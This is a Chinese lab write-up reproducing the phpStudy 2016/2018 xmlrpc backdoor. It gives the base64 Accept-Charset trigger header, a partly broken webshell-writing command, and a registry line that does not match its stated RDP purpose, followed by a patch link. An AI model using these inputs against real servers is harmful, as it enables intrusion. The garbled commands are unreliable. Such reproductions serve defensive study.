phpstudy_2016-2018_rce 漏洞复现及深度利用

说明	内容
漏洞编号	phpstudy_2016-2018_rce
漏洞名称	RCE(Remote Command|Code Execute)
漏洞评级	高危
影响范围	phpStudy 2016 phpStudy 2018
漏洞描述	攻击者可以利用该漏洞执行PHP 命令，也可以称作 phpStudy 后门 。

漏洞描述

攻击者可以利用该漏洞执行PHP 命令，也可以称作 phpStudy 后门 。RCE(Remote Command|Code Execute)

Phpstudy软件是国内的一款免费的PHP调试环境的程序集成包，通过集成Apache、PHP、MySQL、phpMyAdmin等多款软件一次性安装，无需配置即可直接安装使用，一键搭建。 其中2016、2018版本的phpstudy存在被黑客恶意篡改后形成的RCE漏洞。该漏洞可以直接远程执行系统命令。

影响版本

后门代码存在于\ext\php_xmlrpc.dll模块中，至少有2个版本： phpStudy2016和phpStudy2018自带的php-5.2.17、php-5.4.45。 其中： phpStudy2016查看：

  \phpStudy\php\php-5.2.17\ext\php_xmlrpc.dll
\phpStudy\php\php-5.4.45\ext\php_xmlrpc.dll

phpStudy2018查看

\PHPTutorial\PHP\PHP-5.2.17\ext\php_xmlrpc.dll
\PHPTutorial\PHP\PHP-5.4.45\ext\php_xmlrpc.dll

漏洞复现

基础环境

组件	版本
OS	Windows 7 x64
Web Server	phpStudy 2016（特别版）

漏洞扫描

 win7 可以访问server2016

 启动purb工具拦截服务器与浏览器之间的流量

 

 将抓到的报文重放

 

漏洞触发验证

触发条件

Accept-Charset: c3lzdGVtKCd3aG9hbWknKTs=
Accept-Encoding: gzip,deflate

 

 

深度利用

第一种方式burp 执行系统命令

phpstudy软件被插入后门，通过php system函数执行系统命令，所以我们也可以通过system()函数写入webshell，

system(' ECHO ^>"C:/phpStudy/WWW/demon.php ');

第二种方式 也可以在kali里使用 python脚本 实现远程图形化控制

 

 

 启用账户

 

开启3389端口：reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f

kali 启动remmina 远程控制对方

 

 

 

 

 

修复建议

下载：http://downinfo.myhostadmin.net/phpxmlrpc.rar 解压

复制文件

php\php-5.2.17\ext\php_xmlrpc.dll

php\php-5.4.45\ext\php_xmlrpc.dll

覆盖原路径文件即可。